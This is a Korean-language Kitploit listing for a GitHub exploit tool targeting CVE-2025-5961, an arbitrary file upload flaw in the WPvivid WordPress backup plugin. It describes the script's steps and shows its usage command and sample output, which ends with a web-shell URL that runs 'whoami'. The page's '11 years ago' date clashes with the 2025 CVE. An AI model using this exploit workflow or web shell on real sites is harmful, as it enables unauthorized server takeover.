Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-5961 — 마이그레이션, 백업, 스테이징 – WPvivid Backup & Migration <= 0.9.116 - 인증된 (관리자+) 임의 파일 업로드 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-5961
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubnxploited/cve-2025-5961

CVE-2025-5961

마이그레이션, 백업, 스테이징 – WPvivid Backup & Migration <= 0.9.116 - 인증된 (관리자+) 임의 파일 업로드

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 마이그레이션, 백업, 스테이징 – WPvivid Backup & Migration <= 0.9.116 - 인증된 (관리자+) 임의 파일 업로드

📈 이 취약점은 700,000개 이상의 설치 수를 가진 플러그인에 영향을 미칩니다


📝 CVE 세부 정보

  • CVE: CVE-2025-5961
  • CVSS: 7.2 (높음)
  • 게시일: 2025년 7월 3일

🔍 설명

WordPress용 Migration, Backup, Staging – WPvivid Backup & Migration 플러그인은 0.9.116을 포함한 모든 버전에서 wpvivid_upload_import_files 함수의 파일 형식 검증 누락으로 인해 임의 파일 업로드에 취약합니다.

이로 인해 **인증된 공격자(관리자 수준 이상)**가 서버에 임의의 파일을 업로드하여 잠재적으로 원격 코드 실행을 가능하게 합니다.


🧰 스크립트

이 저장소에는 CVE-2025-5961에 대한 익스플로잇 스크립트가 포함되어 있으며, Python으로 작성되었으며 다음을 수행합니다:

  • 플러그인 버전 확인.
  • 관리자로 로그인.
  • 플러그인 페이지에서 필요한 nonce 추출.
  • 웹 셸 페이로드 업로드.
  • 셸에 접근할 URL 출력.

🖥️ 사용 예

root@kitploit:~
python3 CVE-2025-5961.py -u http://target/wordpress -un admin -p password123

⚙️ 사용법

root@kitploit:~
$ python3 CVE-2025-5961.py -h

usage: CVE-2025-5961.py [-h] -u URL -un USERNAME -p PASSWORD

CVE-2025-5961 Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL
  -un, --username USERNAME
                        Admin username
  -p, --password PASSWORD

📊 출력 예

root@kitploit:~
[+] Checking plugin version...
[+] Detected plugin version: 0.9.116
[+] Target is vulnerable. Continuing exploit.
[+] Logging in to http://target/wordpress...
[+] Logged in successfully.
[+] Fetching WPvivid page to extract nonce...
[+] Extracted nonce: 502d5dce0e
[+] Uploading shell...
[+] Exploit succeeded!
[+] Shell URL: http://target/wordpress/wp-content/wpvividbackups/ImportandExport/shellnxploited.php?cmd=whoami
Exploit By: Khaled Alenazi (Nxploited) - https://github.com/Nxploited/

⚖️ 면책 조항

이 스크립트는 교육 및 연구 목적으로만 제공됩니다.
저자는 이 도구로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.


✍️ 작성자

Khaled Alenazi (Nxploited)
🌐 GitHub

도구 다운로드